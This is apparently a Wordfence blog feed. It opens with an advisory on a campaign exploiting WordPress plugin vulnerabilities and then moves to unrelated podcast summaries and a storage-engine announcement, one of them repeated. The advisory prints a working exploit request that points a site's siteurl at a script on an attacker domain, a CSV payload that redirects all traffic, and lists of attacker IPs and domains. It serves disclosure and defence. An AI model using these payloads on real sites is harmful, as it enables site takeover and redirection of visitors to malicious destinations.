Over the past few weeks, our Threat Intelligence team has been tracking an active attack campaign targeting a selection of new and old WordPress plugin vulnerabilities. These attacks seek to maliciously redirect traffic from victims’ sites to a number of potentially harmful locations.

Each of the vulnerabilities targeted by this campaign have been public for some time, and Wordfence users are protected either by individual firewall rules or generic protections built into the plugin. Two of the vulnerabilities in question have firewall rules which are currently available to Premium users only:

• NicDark Plugins – Unauthenticated Arbitrary Options Update
  • Though several individual plugins are affected, the vulnerability is the same across each and they are covered by a single firewall rule.
  • Affected plugin slugs are prefixed with nd-. Example plugins include Components For WP Bakery Page Builder (slug: nd-shortcodes), Booking (slug: nd-booking, Travel Management (slug: nd-travel), etc.
  • Firewall rule released for Premium users on July 30, 2019
  • Available for Free users starting August 29. 2019
• Simple 301 Redirects Addon – Bulk Uploader <= 1.2.5 – Unauthenticated Options Update
  • Firewall rule released for Premium users on August 6, 2019
  • Available for Free users starting September 5, 2019

Each of these plugins have updates available which resolve the vulnerabilities. All WordPress users, regardless of firewall status, are advised to keep their plugins up-to-date at all times.

In today’s post we’ll look at the attacks associated with this campaign, and we’ll provide some useful indicators of compromise (IOCs) to assist in identifying similar activity.

Attacks Against NicDark Plugins

The vulnerabilities recently patched in plugins developed by NicDark are all exploited by very similar AJAX requests. In each case the plugin registers a nopriv_ AJAX action, which is accessible even by unauthenticated visitors, responsible for importing various WordPress settings. In these requests, key->value pairs of WordPress options and values are parsed out and applied directly to the affected site’s database.

For example, the following POST request is an attempt to attack the Travel Management plugin:

POST /wp-admin/admin-ajax.php?nd_travel_value_import_settings=siteurl%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Range: bytes=0-1000000
Connection: keep-alive
Host: [redacted]
Content-Type: application/x-www-form-urlencoded
Content-Length: 204

action=nd_travel_import_settings_php_function&nd_travel_value_import_settings=siteurl%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_travel_end_option%5D

In each case, the targeted plugin must be declared in both the action parameter and the GET query string parameter defining the new option values, such as this example’s nd_travel_value_import_settings.

Because these vulnerabilities allow unauthenticated users to modify arbitrary WordPress options, it’s possible for attackers to enable registration as an Administrator user. However, we don’t see that behavior associated with this attack campaign. Instead, as seen in the sample request above, the attackers are modifying the siteurl setting of the victim’s site. In this case, the new value is https://jackielovedogs.com/pret.js?l=1. A subsequent request would then make the same change for the home setting.

The result of this modification is that all of the victim site’s scripts will attempt to load relative to that injected path. For example, instead of a site’s jQuery script loading from https://example.com/wp-includes/js/jquery/jquery.js, it would instead cause the visitor’s browser to open the URL https://jackielovedogs.com/pret.js?l=1/wp-includes/js/jquery/jquery.js. In effect, this replaces all of a site’s loaded JavaScript with a file under the attacker’s control.

Attacks Against Simple 301 Redirects Addon – Bulk Uploader

The other most common attack vector we’ve tracked in this campaign is the Simple 301 Redirects – Addon – Bulk Uploader plugin, which recently patched a vulnerability allowing unauthenticated attackers to inject their own 301 redirect rules onto a victim’s site.

Vulnerable versions of the plugin would constantly listen for the presence of the POST body parameter submit_bulk_301. If this value is present, an uploaded CSV file would be processed and used to import a bulk set of site paths and their redirect destinations.

The following is an example of the CSV files attackers are attempting to upload:

/,https://developsincelock.com/54768?
*,https://developsincelock.com/5868?
/*,https://developsincelock.com/34234?

When a vulnerable site processes this CSV, the site will begin redirecting all of its traffic to the addresses provided.

Other Targeted Plugins

In addition to the primary two above, we have identified related attacks against a number of other formerly-vulnerable plugins, including (but not limited to):

• Woocommerce User Email Verification
• Yellow Pencil Visual Theme Customizer
• Coming Soon and Maintenance Mode
• Blog Designer

Payload Behavior Analysis

The domains used by the attackers in performing these script injections and redirects rotate with some frequency. New domains appear every few days, and attacks involving older domains taper off. We provide a list of the domains we’ve identified in the IOC section below.

At this time, many of the redirect domains associated with these attacks appear to have been decommissioned, despite the fact that these domains still show up in active attacks at the time of this writing. For example jackielovedogs.com, which appeared in the example request in the ND plugin section above, appears to have been reclaimed by Registrar.eu, a reseller name used by ICANN registrar Openprovider.

Further analysis of this campaign’s long-term behavior is ongoing, and we will provide a followup report as necessary.

Indicators of Compromise (IOCs)

The following IOCs can be used in the process of identifying or tracking activity associated with this campaign.

IP Addresses

The attacks are distributed across a large number of IPs. The top 20 IPs associated with this campaign are listed below. Additionally, addresses listed in bold text appear in the list of IPs Attacking Most Sites as seen in the most recent Wordfence Weekly.

1. 192.99.38.186
2. 51.38.69.87
3. 62.210.252.196
4. 164.132.44.97
5. 159.203.81.46
6. 217.182.95.250
7. 51.255.43.81
8. 37.187.198.246
9. 54.36.246.232
10. 45.55.152.56
11. 198.199.100.240
12. 162.241.175.243
13. 188.213.175.168
14. 45.40.143.13
15. 188.213.166.219
16. 192.169.227.95
17. 193.70.2.138
18. 149.202.75.164
19. 192.169.157.142
20. 104.238.97.201

Domain Names

• greatinstagrampage.com
• gabriellalovecats.com
• jackielovedogs.com
• tomorrowwillbehotmaybe.com
• go.activeandbanflip.com
• wiilberedmodels.com
• developsincelock.com

Conclusion

An active campaign is targeting a number of vulnerabilities in attempts to redirect victim sites’ visitors to potentially harmful destinations. The vulnerabilities in question have all been patched by their developers, so ensure all of your WordPress plugins are up to date. Wordfence Premium users who are unable to update are protected from all of these attacks, while Free users will gain access to these rules in the coming weeks.

Our investigation into these attacks is ongoing. We will continue to track further changes in the campaign’s infrastructure and will provide followup reports as necessary.

As always, please consider sharing this post with your peers to spread awareness of this malicious activity. Additionally, if you believe your site has fallen victim to these or any other attacks, our site cleaning team is here to help. Thank you for reading.

As of WordCamp Boston 2019, Sandy Edwards has organized 26 KidsCamps across the US. We talk about what kids do at a WordPress KidsCamp, the success these kids have had publishing with WordPress, and how Sandy teaches basic internet safety and security to the next generation of WordPress users. Sandy is an organizer at WordCamp Orlando as well as a homeschooling mom, and she runs a digital agency helping small businesses benefit from data-driven marketing.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Sandy on Twitter as @sunsanddesign and at datadrivenlabs.io. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Today we are launching a version of Wordfence containing a new feature for sites on hosting providers with read-only file systems such as WP Engine or for environments where multiple web servers are behind a load balancer. This new feature uses a MySQL storage engine for firewall attack data to protect WordPress sites in complex hosting environments.

For most sites, Wordfence uses the file system to store data about attacks. Writing attack data to the file system is the most efficient method of doing so, and if a site allows for file access, your Wordfence plugin will continue to use this method.

WP Engine’s File System Locking

One of WP Engine’s security features only allows write access to the filesystem when a WordPress administrator is logged in. When there is no active administration session, the file system is read-only. This is a great security feature to limit file changes when no authenticated user is working on the site. However it limits the ability for certain plugins to work optimally, such as Wordfence.

In cases like this where file system access is not allowed, the new Wordfence MySQL storage engine allows WP Engine users to leverage Wordfence’s unparalleled protection for WordPress.

Load Balancers are now supported

In load balanced environments, state is not maintained on individual WordPress servers. This prevents Wordfence from using a file-based storage scheme for the firewall. The new Wordfence MySQL storage engine solves this by allowing a load balanced site to maintain state across multiple web servers, using MySQL as a central storage system.

Wordfence customers can now deploy Wordfence in their load balanced environments and scale their web server cluster horizontally while benefiting from Wordfence protection for the entire installation. We have many larger customers who are very excited about this new feature.

Wordfence MySQL Storage Engine FAQ

As we are sure you have questions, we wanted to provide some answers to determine what this means for your sites.

Q: I’m not using WP Engine. What changes do I have to make?
Nothing will change, and you won’t have to change anything. Wordfence will continue to work exactly as it always has on your site. In fact, we recommend you don’t change anything. This new feature is an accommodation for complex environments only. There are no new settings that you need to adjust.

Q: I’m installing Wordfence on a site at WP Engine. What do I have to do?
Site owners do not have to change anything. Wordfence will detect your WP Engine installation and make the required configuration change to activate the MySQL storage engine for the firewall

Q: I have a site hosted behind a load balancer. What do I need to do?
In order to have the MySQL storage engine enabled in load balanced environments, a constant will need to be changed in the Wordfence environment.

To configure the WAF to use the MySQL storage engine, you would need to add define(‘WFWAF_STORAGE_ENGINE’, ‘mysqli’); to the top of your site’s wordfence-waf.php in Extended Protection mode. Our documentation details how to do this.

Q: How will this change performance of Wordfence?
There are no changes in performance for either the Wordfence firewall or scan engine. This new feature only changes how the recording of attacks are stored for sites on WP Engine or load balanced servers. Performance will not be affected.

Q: Do I have to use Wordfence Premium to use the MySQL storage engine?
The MySQL storage engine is completely free. It is available for users running Wordfence Premium and our free community customers. That means that both the free and Premium versions of Wordfence will now be supported on WP Engine.

Q: Anything else we should know?
WP Engine needs to make a change on their end once we release this version of the plugin to ensure that Wordfence is fully supported. There may be a brief delay while they make this change, so please be patient. If you are trying to enable Wordfence on WP Engine and are having trouble, please contact their support team. We are working directly with WP Engine and they are able to reach out to us in case we need to provide assistance.

If you are using a load balanced environment and need help enabling this new feature, please don’t hesitate to reach out to our support team either via our ticketing system for Premium customers, or via our public forums if you are a free customer.

We welcome your feedback about Wordfence’s MySQL storage engine and how Wordfence supports your security on WP Engine and load balanced WordPress environments.

All product names, trademarks and registered trademarks are property of their respective owners. All company, product and service names used in this post are for identification purposes only. Use of these names,trademarks and brands does not imply endorsement.

A recent discussion among WordPress core developers about removing support for code signing in core caught our attention. Code signing support was included with the WordPress 5.2 release. The discussion centers around removing code signing and implementing SSL verification and hashes to verify code integrity. In this week’s episode we chat about the history behind the vulnerability found by Wordfence’s Matt Barry, which is what motivated the addition of code signing to WordPress core. We review several high profile supply chain attacks and discuss how SSL and hashes would not protect against a sophisticated attack on WordPress core servers.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

Some sources we reference in this week’s episode include:

• The discussion on make.wordpress.org.
• The trac ticket update to the initial campaign for securing WordPress against infrastructure attacks.
• Scott Arciszewski’s analysis of Server-Side HTTP Requests for WordPress developers.
• Matt Barry’s discovery of a vulnerability in WordPress infrastructure.
• Other supply-chain attacks that have exploited software delivery, including: ASUS, the Flame Windows exploit, and the CCleaner “ShadowPad” exploit which affected over 2.27 million computers.
• A previous supply-chain attack on WordPress plugins which affected 9 plugins over 4.5 years.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Do you have thoughts about WordPress core update code signing? Please feel free to post your feedback in the comments below.

Topher DeRosia is the Developer Evangelist for BigCommerce and a frequent WordCamp speaker. He’s worked with WordPress for a long time and is the man behind HeroPress, telling the stories of people whose lives have been transformed by WordPress. HeroPress is now syndicated on WordPress.org/news, bringing these inspirational stories to an even wider audience. At WordCamp Boston, Topher and Kathy talked about everything WordPress, from security to eCommerce, HeroPress, headless WordPress, headless eCommerce as well as how these new methods of distributing content and commerce will change publishing.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Topher on Twitter as @topher1kenobe and at topher1kenobe.com and at HeroPress.com. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

The Wall Street Journal reported on Monday, August 12, 2019 that Verizon is selling social media and blogging platform Tumblr to Automattic for an undisclosed sum, though rumors state that it may be as low as $3 million dollars. After the announcement, Automattic CEO Matt Mullenweg discussed the news on PostStatus, stating that they plan to migrate infrastructure off of Verizon, move Tumblr’s backend to WordPress, and support the same APIs on both WordPress.com and Tumblr. Mullenweg noted on PostStatus that this acquisition is “by far the largest investment or acquisition Automattic has ever made.” In this episode, we discuss the implications for Tumblr, WordPress, and Automattic.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover Automattic’s purchase of Tumblr from Verizon. Some sources we reference include:

• The announcement in the Wall Street Journal.
• Coverage on PostStatus, where Matt Mullenweg answered questions from the community. David Bisset and Brian Krogsgard did a great job of covering the story.
• An Axios article reporting that the price was approximately $3 million.
• A post on WP Tavern covering the implications of WordPress on the Tumblr backend.
• An older article detailing Tumblr architecture.
• Hacker News discussion about the Tumblr acquisition.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Do you have thoughts about Automattic’s buy of Tumblr? Please feel free to post your feedback in the comments below.

In this episode, Mark chats with Vito Peleg, the founder of WP Feedback, a plugin that helps WordPress-focused agencies streamline approval and support for their customers. Vito talks about the glass ceiling in agencies where managing people and projects begins to inhibit growth and profitability. He also shares some interesting thoughts on where pain points lie and how to move past them, as well as how to effectively leverage your own customers to inform product design.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Vito and Feedback WP on Twitter as @FeedbackWP and at www.wpfeedback.co. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

This week, we talk about our corporate trip to DEF CON, the WordPress security team’s proposal to backport security fixes to fewer releases, a new feature proposal called WP Notify that has a number of very positive implications for WordPress users, Cloudflare’s decision to terminate service for 8Chan, and a European court’s ruling that companies using the Facebook “like” button are liable for data collection.

Here are timestamps in case you would like to jump around:
1:18 The Defiant trip to DEF CON
3:05 WordPress Security team proposes backporting fixes to fewer releases
6:58 Feature Proposal: WP Notify
11:52 Cloudflare terminates service for 8Chan
16:05 Sites using Facebook “like” button liable for data

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

• The WordPress security team discusses backporting security fixes to fewer versions.
• A new feature project proposal for WP Notify looks to introduce better notifications for system state changes.
• Cloudflare announces termination of service for 8Chan.
• Sites using the Facebook ‘Like’ button liable for data, rules a EU court.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant. To learn more about Open, visit open.film. Please feel free to post your feedback in the comments below.

This week, we talk about our corporate trip to DEF CON, the WordPress security team’s proposal to backport security fixes to fewer releases, a new feature proposal called WP Notify that has a number of very positive implications for WordPress users, Cloudflare’s decision to terminate service for 8Chan, and a European court’s ruling that companies using the Facebook “like” button are liable for data collection.

Here are timestamps in case you would like to jump around:
1:18 The Defiant trip to DEF CON
3:05 WordPress Security team proposes backporting fixes to fewer releases
6:58 Feature Proposal: WP Notify
11:52 Cloudflare terminates service for 8Chan
16:05 Sites using Facebook “like” button liable for data

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

• The WordPress security team discusses backporting security fixes to fewer versions.
• A new feature project proposal for WP Notify looks to introduce better notifications for system state changes.
• Cloudflare announces termination of service for 8Chan.
• Sites using the Facebook ‘Like’ button liable for data, rules a EU court.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant. To learn more about Open, visit open.film. Please feel free to post your feedback in the comments below.

Jem Turner was one of the security researchers that found malicious code in Pipdig’s P3 plugin. Both Jem and Wordfence’s Mikey Veenstra found the P3 plugin to contain a number of suspicious or malicious features, including a remote “killswitch,” an obfuscated function used to change users’ passwords, and code which generated hourly requests to DDoS a competitor’s site. At WordCamp Europe, Mark sat down with Jem and asked about her process of finding this malicious code and the diligence in her research. Jem also talks about the unexpected reaction from the Pipdig developer and their users, and how the community of bloggers banded together to help each other.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Jem on Twitter as @jemjabella and at www.thejempire.net. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.